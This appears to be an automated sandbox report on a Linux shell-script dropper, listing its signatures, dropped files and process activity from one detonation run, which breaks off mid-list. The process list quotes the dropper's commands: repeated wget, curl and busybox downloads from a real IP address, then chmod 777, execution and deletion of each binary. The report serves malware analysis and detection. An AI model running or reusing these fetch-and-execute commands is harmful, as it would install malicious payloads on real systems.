Malware Analysis Report

2025-04-03 18:56

Sample ID 241121-bcpcnaxlbz
Target 03bce81f9ac0231f5c850a3fb1c16781.bin
SHA256 891b558f4ebf530fc58f28f946e11062fdbc28d044f561b63c58ccaa11f5e738
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

891b558f4ebf530fc58f28f946e11062fdbc28d044f561b63c58ccaa11f5e738

Threat Level: Shows suspicious behavior

The file 03bce81f9ac0231f5c850a3fb1c16781.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 01:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 01:00

Reported

2024-11-21 01:02

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

11s

Max time network

131s

Command Line

[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN N/A
N/A /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e N/A
N/A /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc N/A
N/A /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ N/A
N/A /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy N/A
N/A /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc N/A
N/A /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx N/A
N/A /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH N/A
N/A /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 N/A
N/A /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk N/A
N/A /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO N/A
N/A /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV N/A
N/A /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi N/A
N/A /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM N/A
N/A /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV N/A
N/A /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi N/A
N/A /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM N/A
N/A /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO N/A
N/A /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN N/A
N/A /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e N/A
N/A /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc N/A
N/A /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ N/A
N/A /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy N/A
N/A /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH N/A
N/A /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 N/A
N/A /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk N/A
N/A /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc N/A
N/A /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /usr/bin/curl N/A
File opened for modification /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /usr/bin/curl N/A
File opened for modification /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /usr/bin/curl N/A
File opened for modification /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /usr/bin/curl N/A
File opened for modification /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /usr/bin/curl N/A
File opened for modification /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /usr/bin/curl N/A
File opened for modification /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /usr/bin/curl N/A
File opened for modification /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /usr/bin/curl N/A
File opened for modification /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /usr/bin/curl N/A
File opened for modification /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /usr/bin/curl N/A
File opened for modification /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /usr/bin/curl N/A
File opened for modification /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /usr/bin/curl N/A
File opened for modification /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /usr/bin/curl N/A
File opened for modification /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /usr/bin/curl N/A
File opened for modification /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /usr/bin/curl N/A
File opened for modification /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /usr/bin/curl N/A
File opened for modification /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /usr/bin/curl N/A
File opened for modification /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /usr/bin/curl N/A
File opened for modification /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /usr/bin/curl N/A
File opened for modification /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /usr/bin/curl N/A
File opened for modification /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /usr/bin/curl N/A
File opened for modification /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /usr/bin/curl N/A
File opened for modification /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /usr/bin/curl N/A
File opened for modification /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /usr/bin/curl N/A
File opened for modification /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /usr/bin/curl N/A
File opened for modification /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /usr/bin/curl N/A
File opened for modification /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /usr/bin/curl N/A
File opened for modification /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /usr/bin/curl N/A

Processes

/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh

[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/chmod

[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN

[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/rm

[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/wget

[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/chmod

[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e

[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/rm

[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/wget

[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/chmod

[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc

[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/rm

[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/wget

[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/chmod

[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ

[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/rm

[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/chmod

[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy

[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/rm

[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/wget

[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/chmod

[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc

[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/rm

[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/wget

[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/chmod

[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx

[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/rm

[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/usr/bin/wget

[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/chmod

[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH

[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/rm

[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/wget

[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/chmod

[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3

[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/rm

[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/wget

[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/chmod

[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk

[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/rm

[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/wget

[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/chmod

[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO

[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/rm

[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/wget

[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/chmod

[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV

[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/rm

[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/wget

[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/chmod

[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi

[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/rm

[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/wget

[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/chmod

[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM

[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/rm

[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/wget

[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/chmod

[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV

[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/rm

[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/wget

[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/chmod

[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi

[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/rm

[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/wget

[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/chmod

[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM

[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/rm

[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/wget

[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/chmod

[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO

[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/rm

[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/wget

[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/chmod

[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN

[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/rm

[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/wget

[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/chmod

[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e

[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/rm

[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/wget

[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/chmod

[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc

[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/rm

[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/wget

[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/chmod

[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ

[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/rm

[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/chmod

[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy

[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/rm

[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/wget

[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/chmod

[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH

[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/rm

[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/wget

[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/chmod

[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3

[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/rm

[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/wget

[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/chmod

[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk

[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/rm

[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/wget

[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/chmod

[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc

[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/rm

[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/wget

[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/busybox

